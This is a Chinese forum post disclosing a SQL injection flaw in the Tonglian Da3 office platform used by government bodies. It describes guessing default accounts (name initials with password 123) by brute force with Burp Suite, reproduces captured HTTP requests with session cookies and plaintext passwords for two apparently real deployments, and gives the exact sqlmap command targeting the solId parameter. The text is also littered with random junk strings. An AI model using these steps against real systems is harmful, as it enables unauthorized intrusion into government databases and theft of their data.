找回密码
 立即注册
查看: 2214|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" H `& }& m. s/ K! x. I
% S5 o+ N9 g. z* Q& P

8 A* m( W6 |( h1 x" Z5 K: x: B$ Z

" a6 p* B0 q6 K: U. d8 o5 g6 w- { 平台简介:2 S* f- l2 x* T

$ z- r: W; r5 j7 B1 u& E7 n/ E! v) t

" h: W) A3 y6 c7 P; E3 W  9 x1 f7 u7 B4 T0 y

; R3 l8 X) X3 e D# F

1 y0 y: f( u1 n# i) N* G$ f 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
1 H9 }) L+ I* @6 F) n h3 j同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* ^; W, ^2 R- ?2 b* }% a, d同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!% O9 q7 p3 Y. {' o8 r- }9 `

# o0 d" E+ T# ^2 V) G

9 S4 R& ^9 u! B+ H: N! j& V+ n. N  , L2 H8 O: i7 D% `( q! m, V+ |

! k4 }- K0 y8 L5 r' }- ?0 v8 L

?+ z r: _% z: w 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 4 k0 P# O( a; k ?

( h1 \! u# n. v) r5 J p1 b

4 e$ l3 S$ l" d* {   ! _1 O/ \' e) L/ _ f! c

# p9 X3 ]# d8 h2 D3 w

$ ?1 E& @' S4 q http://1.1.1.1:7197/cap-aco/#(案例2-)2 ?* E. P& ?9 T& _- }4 D

5 E# }3 t2 [; i/ j! y

+ s9 J1 }- f6 v: n% f y- s http://www.XXOO.com (案例1-官网网站)& Z- b. c& `1 F

8 m6 A- N m, i6 I1 W: X) p+ j" \

" G) K1 i* e5 W, J: l2 F% x2 e   " k, k+ U9 |3 R( {+ i/ e% o5 W0 ?1 e

$ ?# \6 l$ Y& N" b1 b4 F

: \1 e2 U! P: N8 H 漏洞详情:$ j8 C2 P* q: T6 G- ~+ i9 E: U9 l

: N* b6 K! T% Y: S0 ^+ b( p

) b' Q4 v, p7 y) }% _  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 ' C0 S9 o0 F X4 h8 _% b3 t

; H+ ?' t3 f" p" ?

7 l% ^( z( \6 A: F: J2 b( O      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; K: X5 N; m7 R0 Q" |1 ?' `7 k$ }* b* g

: t, e- U" t2 a+ N$ w

1 n0 w a! M4 D9 |* Q% L1 p   0 \4 x K$ H$ J+ v9 b

( W* L* \6 p& `; o, l- C* B; ?

) ^% k% P: O4 m# Q* r  ; P2 H7 J) v% P/ C' u' _; J2 g

% c7 Z1 E$ g8 G( _ ?

% b4 h1 t0 V& @: |& {+ i$ _. T( b0 [ status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 Z/ n$ b& ^7 L- `: h

; z0 y$ i7 E" Z2 _

. d7 w7 j' s* n1 w: X% I, t 1、案例1-官方网站1 c2 H1 y& q1 X2 Q, m; q% U3 f8 q8 @

3 a0 ^- P& L1 ~: |

, M% w1 ^' L* @; |/ N GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 4 G6 I/ @% ^8 |: i3 K4 k# m# T

1 u- {* |) C. @4 t. ], {1 `# m

# r6 G- k! ^: [! r% F- G7 `* h Host: www.XXOO.com7 Y/ a9 d7 D Q' t7 A

; y) R0 n$ B: s$ K0 W {

( N$ o' Q) @8 i. v: E, G9 f Proxy-Connection: Keep-Alive$ ~7 k$ t. I* y Q7 B

3 G9 a3 F0 V$ h$ m& g# `5 n' y

% v2 p$ ?0 W# N9 V Accept: application/json, text/javascript, */*; q=0.01 7 a/ s* ?3 P& `: k* Z6 v

1 r5 U! p% s1 J9 E. v

0 ~, y* [& V+ C7 Y$ Y Accept-Language: zh-CN - Z( X$ E/ x) F4 ~& z2 B3 m

; R1 K9 i; P% p% T8 S" ^

c8 } {% v+ ~( N; c+ ]& e% G2 j Content-Type: application/json 3 o$ F, `/ h, L3 l4 j; ~

: J: d0 @) n- K) L

/ Z2 J( s9 a* ^$ Q* N3 h8 d6 M! l/ d User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko3 f1 G1 b# D) p1 N" x7 I' R

; ^. E8 i t- Q4 X2 u

4 i- ~5 s. j' {. c X-Requested-With: XMLHttpRequest 9 m* Q1 V/ t" M7 ^" z

/ d2 b2 ]! ^8 \$ ]. c! N& n, D' S

0 T# J% N- g% W0 y8 { k Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002& U# D/ P3 n7 W* H9 W

# x/ |, r9 S" p1 z) X. l

( q' A5 p3 Y/ s( w8 X Accept-Encoding: gzip, deflate, sdch 2 m" e) ]' w' O

" z8 y! B8 R2 @3 k z& a

7 U# L+ b' l" h2 w4 S Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e * R) h9 z! T5 ?5 O

1 l% m+ T `' G2 E( t0 h% U1 D

7 }' c' w. m8 F+ q" m( w: g- e* l 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 6 O5 @$ g. y: ]) I

1 z/ U) Q! K' u" F/ {" T5 [

( g& y+ t/ B! y. M! w   + \0 H8 x U9 Q5 R

+ r5 ]- C0 Q. x& F, `

# N7 N# \" l& m. A% y% Z   4 G. I/ l% P' H+ {6 [- W

' i4 q8 N/ ?) q8 C$ ^9 a! l

$ e, i! J8 D {7 w/ Z' Q  ! S* h( f5 F! c

$ d! P- W. U. u: B; ?' G

; X$ ^8 B, a% a+ }# {  ' z5 J( h" K+ G' c

( V' V S" `8 c3 ]

" j7 ~0 ^( ^2 W. b+ h- n" g& l   ( y: e* J9 ]% l. i% m0 t: [' |

6 j) u3 _+ s" d: l, Z u

4 {" L4 h% O3 \8 p 2、案例2-某天河云平台 6 T6 e+ P" B5 O! x) s

4 O# [& _3 s2 G

; j1 s0 b( w4 ?# s GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.13 Z7 O' ?6 [3 O6 G7 g. O& n6 q: h

" K) g$ z6 ]/ H! U' J+ E8 q

5 U9 ~! q7 V: K6 g Host: 1.1.1.:71979 U' Y* i9 U6 o1 t

. }% {+ s. b5 c6 \

0 t1 g% d4 K( K& V Accept: application/json, text/javascript, */*; q=0.01 2 y( ?( y( P5 b2 f7 x r( v

* _' k5 o9 n+ m9 N5 Y& C, G

; S4 v5 N8 l+ o6 b X-Requested-With: XMLHttpRequest+ C8 ?( |$ Z, G. f: `. n! }

/ b) p, y) T7 I* F, U6 K8 F, Z+ Y

5 C# q1 w5 i) `0 k1 v6 { User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.07 Y! I5 U# _. A8 G5 J0 E

/ v- l$ h' w& l6 H$ U, x

+ E' m7 w [1 ^1 C/ G) j) j0 l% M Content-Type: application/json 5 j9 u7 p. U, ?: c" C! j% x: D5 `

* p4 S1 ^. w% f6 Q( H( f! f2 B

: J6 P( Y/ ~1 S Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 6 S) A5 b* x) Z0 U0 b- ]# o1 x

5 u# Y' {: x3 o8 P M& L- j7 A- G

. _ z$ _8 b+ p5 U5 z Accept-Language: zh-CN,zh;q=0.8 % ]3 a" B1 c8 o7 ]. f5 ]- Q- |

( m' l* J% g6 f5 B( g

/ j! O& Q* R9 K! j9 k& a- } Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 % O6 V" Z; f. R. Q3 A

5 s- K7 @& [# w1 P: r

( y$ W8 @. D% M- h0 q Connection: close; m2 `( C- g# h( h4 p

, u- F" l4 t( N: \

1 a* \: d& m, j8 b- ^ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: M% v- L0 A( W, f( s- S: a

, G. R+ I4 p! N; w/ b P

7 @: u; t9 r N+ {" N4 L. T% Y" w   ; ]5 F' y0 u. ^ \( G' ]

1 Q; P8 I8 ?0 F1 o# z3 N7 V O

# I* ^0 ?7 Y4 U& K9 d' x
: N; T+ S2 V9 l* W4 _

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表